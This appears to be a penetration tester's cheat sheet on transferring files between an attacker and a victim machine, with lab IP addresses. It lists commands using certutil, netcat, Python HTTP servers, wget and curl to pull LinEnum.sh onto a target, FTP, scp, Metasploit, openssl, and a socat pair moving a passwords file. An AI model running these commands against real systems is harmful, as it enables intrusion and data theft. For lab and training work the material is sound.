File Transfer

certutil -encode infile.exe outfile.txt

#Text splitter
https://textfilesplitter.com/

nc

-n option to skip DNS name resolution

  • On Kali : /usr/share/windows-resources/binaries/nc.exe

  • Get the 32bit version here:

  • Get the 64bit version here:

https://github.com/int0x33/nc.exe/blob/master/nc64.exe

Hosting a server

python -m SimpleHTTPServer
python3 -m http.server

HTTP

wget 10.10.14.23:8000/LinEnum.sh 

axel -a -n 20 -o report_axel.pdf https://file-to-download.txt

curl 10.10.14.23:8000/LinEnum.sh -o /tmp/Enum.sh   

FTP

#Attacker's System
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21 --write

#Victim's System
ftp 10.10.10.13

scp

#Local > Target
scp -i privkey /local/file user@10.10.10.119:/tmp/

Convert to Base64

base64 file
base64 -d foo.zip > foo2.zip
  • Tip: The base64-encoded string contains a bunch of newlines; you can remove them in vi using the command: ":%s/\n//g"

Metasploit

  • Upload

upload /root/Desktop/Destination_Directory
  • Download

download filename /Destination/Directory

openssl

https://gtfobins.github.io/gtfobins/openssl/

openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

socat

#Attacker's host - Send file via 443
sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

#Victim's host - Download file from remote IP on port 443
socat TCP4:<Attacker IP>:443 file:received_secret_passwords.txt,create
